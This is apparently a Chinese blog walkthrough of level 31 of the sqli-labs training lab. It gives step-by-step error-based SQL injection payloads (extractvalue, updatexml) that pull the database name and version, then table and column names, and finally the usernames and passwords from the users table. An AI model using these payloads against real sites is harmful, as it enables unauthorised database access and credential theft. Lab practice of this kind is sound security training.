SQL-labs的第31关——防火墙 报错注入(Get)

1、判断闭合方式

输入语句

?id=1\

,返回页面如下:

我们发现该网站会返回错误,在错误中我们看到\的后面时双引号加括号,所以该关的闭合方式是双引号加括号。

2、选择注入方式

我们输入万能密码

?id=1") or 1=1--+

,返回页面如下:

我们发现正常情况下,该网站会有回显。所以该网站适合union联合查询攻击。

并且,我们也发现该网站会返回错误,所以也适合报错注入。

我们这次选择报错注入。

3、爆破数据库名、用户名、版本

输入语句

?id=1") and extractvalue(1,concat('~',database(),'~',user(),'~',version(),'~'))--+

,返回页面如下:

4、爆破数据表名

输入语句

?id=1") and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),'~'),1)--+

,返回页面如下:

5、爆破字段名

输入语句

?id=1") and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),'~'))--+

,返回页面如下:

6、爆破字段内容

输入语句

?id=1") and updatexml(1,concat('~',(select group_concat(concat(id,'~',username,'~',password,'~')) from users),'~'),1)--+

,返回页面如下:

我们发现返回页面不完整,我们将语句改为:

?id=1") and updatexml(1,concat('~',mid((select group_concat(concat(id,'~',username,'~',password,'~')) from users),20,30),'~'),1)--+

,返回页面如下:

到此打靶结束

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值